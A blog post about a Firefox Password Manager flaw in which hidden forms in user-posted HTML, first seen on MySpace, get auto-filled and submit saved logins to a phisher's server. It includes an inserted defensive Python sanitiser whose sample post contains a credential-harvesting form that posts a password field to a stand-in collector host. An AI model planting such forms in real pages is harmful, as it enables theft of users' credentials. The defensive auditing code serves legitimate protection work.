Chapin Information Services (CIS) have discovered quite a major flaw in the way Firefox's Password Manager automatically populates username and password fields on a web form.

Whilst this is a major time saver, it also allows phishers to gather usernames and passwords without you knowing it, especially on weblogs and forums that allow posters to input HTML. Essentially, they would just create a hidden form that Firefox would automatically populate with your username and password for that site, and which then submits them to the phisher's server when you click a link or hit enter. This doesn't use cross-site scripting (XSS) either, as it's essentially gathering passwords for the site you're actually visiting (hence most phishing detectors won't pick this up).
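As an added illustration (not code from the original post, nor from CIS or Mozilla), here is the kind of server-side check a weblog or forum operator could run over user-submitted HTML before storing it: it flags any form that contains a password field or whose action points at another host, and it strips form-related tags outright, since a comment or profile has no legitimate need for them. The host names, the sample post and the function names are all constructed for the example.

```python
"""Audit and sanitise user-supplied HTML for password-harvesting forms.
Assumed context: a site that lets users post HTML and wants to keep
forms (the vector the page describes) out of that content."""
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tags that user-supplied HTML has no business containing: any of them
# can be used to build a form the browser's password manager will fill in.
FORM_TAGS = {"form", "input", "button", "textarea", "select", "option"}
# Void elements never get a closing tag when re-serialised.
VOID_TAGS = {"br", "hr", "img"}


class FormAuditor(HTMLParser):
    """Records every <form> in a fragment, where it posts, and whether it
    holds a password field."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.forms = []
        self._open = None  # the form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            action = attrs.get("action") or ""
            host = (urlparse(action).hostname or "").lower()
            self._open = {
                "action": action,
                "off_site": bool(host) and host != self.site_host,
                "password_field": False,
            }
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            if (attrs.get("type") or "text").lower() == "password":
                self._open["password_field"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None


def audit_user_html(fragment, site_host):
    """Return human-readable findings for every suspicious form in fragment."""
    auditor = FormAuditor(site_host)
    auditor.feed(fragment)
    auditor.close()
    findings = []
    for form in auditor.forms:
        if form["password_field"] and form["off_site"]:
            findings.append("password form posting off-site to " + form["action"])
        elif form["password_field"]:
            findings.append("password form in user content")
        elif form["off_site"]:
            findings.append("form posting off-site to " + form["action"])
    return findings


class FormStripper(HTMLParser):
    """Re-serialises a fragment with every form-related tag removed."""

    def __init__(self):
        super().__init__()
        self.out = []
        self.removed = 0  # number of form-related start tags dropped

    def _serialise(self, tag, attrs, self_closing=False):
        parts = [tag]
        for name, value in attrs:
            parts.append(name if value is None
                         else f'{name}="{html.escape(value, quote=True)}"')
        return "<" + " ".join(parts) + (" />" if self_closing else ">")

    def handle_starttag(self, tag, attrs):
        if tag in FORM_TAGS:
            self.removed += 1
            return
        self.out.append(self._serialise(tag, attrs))

    def handle_startendtag(self, tag, attrs):
        if tag in FORM_TAGS:
            self.removed += 1
            return
        self.out.append(self._serialise(tag, attrs, self_closing=True))

    def handle_endtag(self, tag):
        if tag in FORM_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text is re-escaped so entities the parser decoded stay harmless.
        self.out.append(html.escape(data, quote=False))


def strip_form_tags(fragment):
    """Return (cleaned_html, number_of_form_tags_removed)."""
    stripper = FormStripper()
    stripper.feed(fragment)
    stripper.close()
    return "".join(stripper.out), stripper.removed


# Constructed sample post: a harmless link followed by a form that would
# collect the browser-filled credentials and post them to another host.
SAMPLE_POST = (
    '<p>Check out my <a href="https://myspace.example/profile">profile</a>!</p>'
    '<form action="http://collector.example/grab" method="post">'
    '<input name="u"><input type="password" name="p"></form>'
)

if __name__ == "__main__":
    for finding in audit_user_html(SAMPLE_POST, "myspace.example"):
        print("REJECT:", finding)
    cleaned, removed = strip_form_tags(SAMPLE_POST)
    print(f"stored ({removed} form tags removed): {cleaned}")
```

The audit is deliberately strict: a form with a password field is flagged even when its action is relative, because user content has no reason to carry one at all. The stripper only removes form-related tags; it is not a full allow-list sanitiser and would sit in front of one rather than replace it.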

This was first discovered on MySpace, and I'm sure if you've visited MySpace before, you'll know you need to login to view a member's profile. View the wrong member's profile and your MySpace login, and who knows what else is now OWNED by someone else.

Mozilla have made the bug report public, and the Master Password Timeout Firefox extension, whilst it doesn't resolve the issue, can help limit your chances of being hit by this.

I like to think I'm quite security conscious, but I certainly wasn't expecting this. I use the password manager, so have opted for the Master Password Timeout plugin and set it to 10 seconds - yes, it means I have to enter my master password a lot, but it also means I'll know when a site is trying to steal my password.